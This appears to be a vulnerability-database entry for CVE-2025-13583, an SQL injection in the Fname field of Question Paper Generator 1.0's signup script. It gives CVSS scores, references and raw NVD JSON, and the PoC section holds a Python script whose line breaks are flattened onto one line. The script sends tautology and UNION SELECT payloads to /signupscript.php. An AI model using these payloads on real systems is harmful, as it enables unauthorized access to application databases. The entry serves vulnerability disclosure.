CVE-2025-13583

Description

A weakness has been identified in code-projects Question Paper Generator 1.0. This affects an unknown part of the file /signupscript.php of the component POST Parameter Handler. Executing manipulation of the argument Fname can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:carmelo:question_paper_generator:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Question Paper Generator 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import sys # CVE-2025-13583 SQL Injection PoC # Target: code-projects Question Paper Generator 1.0 # Vulnerability: SQL Injection in /signupscript.php (Fname parameter) def exploit_sqli(url, payload): """ Exploit SQL injection vulnerability in Fname parameter """ target_url = f"{url}/signupscript.php" # Malicious payload for SQL injection data = { 'Fname': payload, 'Lname': 'test', 'email': '[email protected]', 'uname': 'testuser', 'pass': 'testpass123' } try: response = requests.post(target_url, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-13583.py <target_url>") print("Example: python cve-2025-13583.py http://localhost/question-paper-generator") sys.exit(1) base_url = sys.argv[1].rstrip('/') print("[*] CVE-2025-13583 SQL Injection Tester") print(f"[*] Target: {base_url}") # Test 1: Basic injection to confirm vulnerability print("\n[1] Testing basic SQL injection...") payload = "' OR '1'='1" result = exploit_sqli(base_url, payload) print(f"[*] Payload: {payload}") # Test 2: Database version detection print("\n[2] Testing database version detection...") payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL--" result = exploit_sqli(base_url, payload) print(f"[*] Payload: {payload}") # Test 3: Current database detection print("\n[3] Testing current database detection...") payload = "' UNION SELECT NULL,database(),NULL,NULL,NULL--" result = exploit_sqli(base_url, payload) print(f"[*] Payload: {payload}") print("\n[!] Note: Modify payload based on actual application response") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13583
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13583
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13583/
[4] VulDB https://vuldb.com/cve/CVE-2025-13583
[5] https://code-projects.org/
[6] https://github.com/rassec2/dbcve/issues/6
[7] https://vuldb.com/?ctiid.333347
[8] https://vuldb.com/?id.333347
[9] https://vuldb.com/?submit.699591

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13583", "sourceIdentifier": "[email protected]", "published": "2025-11-24T05:15:58.580", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Question Paper Generator 1.0. This affects an unknown part of the file /signupscript.php of the component POST Parameter Handler. Executing manipulation of the argument Fname can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:carmelo:question_paper_generator:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D75A803B-B1E5-4462-86D4-473B87B5A073"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/rassec2/dbcve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333347", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333347", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.699591", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}